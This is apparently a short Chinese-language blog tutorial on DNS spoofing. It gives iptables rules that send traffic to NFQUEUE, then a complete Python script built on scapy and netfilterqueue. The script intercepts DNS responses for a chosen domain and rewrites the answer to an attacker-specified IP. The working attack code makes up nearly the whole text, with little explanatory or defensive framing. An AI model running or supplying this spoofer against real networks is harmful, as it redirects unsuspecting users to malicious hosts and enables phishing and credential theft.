利用netfilterqueue与scapy模块实现DNS欺骗
本代码主要利用到的模块为netfilterqueue,该模块会将所有的报文进行缓存,缓存到队列的报文从而利用scapy进行解析,并进一步修改,然后将修改后的报文发送出去。
需要设置iptables规则,这里模拟本机发起的请求:
iptables -I OUTPUT -j NFQUEUE --queue-num 0
iptables -I INPUT -j NFQUEUE --queue-num 0
from scapy.all import * import netfilterqueue import sys import optparse class DNSSpoofer: def __init__(self) -> None: self.domain, self.spoofed_ip = self.get_params() def get_params(self): parser = optparse.OptionParser('Usage: < Program > -d domain name to spoof -i spoofed ip address') parser.add_option('-d', '--domain', dest='domain', type='string', help='Specify domain name to spoof') parser.add_option('-i', '--ip_addr', dest='ip_addr', type='string', help='Specify ip address to spoof') options, args = parser.parse_args() if options.domain is None or options.ip_addr is None: print(parser.usage) sys.exit() return options.domain, options.ip_addr def del_elements(self, scapy_packet): del scapy_packet[IP].len del scapy_packet[IP].chksum del scapy_packet[UDP].len del scapy_packet[UDP].chksum return scapy_packet def packet_handler(self, pkt): scapy_packet = IP(pkt.get_payload()) if scapy_packet.haslayer(DNSRR): qname = scapy_packet.getlayer(DNSQR).qname.decode('utf-8') print(qname) if self.domain in qname: answer = DNSRR(rrname=qname,rdata=self.spoofed_ip ) scapy_packet[DNS].an = answer scapy_packet[DNS].ancount = 1 scapy_packet = self.del_elements(scapy_packet=scapy_packet) pkt.set_payload(bytes(scapy_packet)) #注意需要将scapy_packet转换成字节,然后可以作为载荷重新放到队列中,然后发送出去 pkt.accept() def run(self): queue = netfilterqueue.NetfilterQueue() queue.bind(0, self.packet_handler) queue.run() if __name__ == '__main__': dnsspoofer = DNSSpoofer() dnsspoofer.run()
STRIVE FOR PROGRESS,NOT FOR PERFECTION
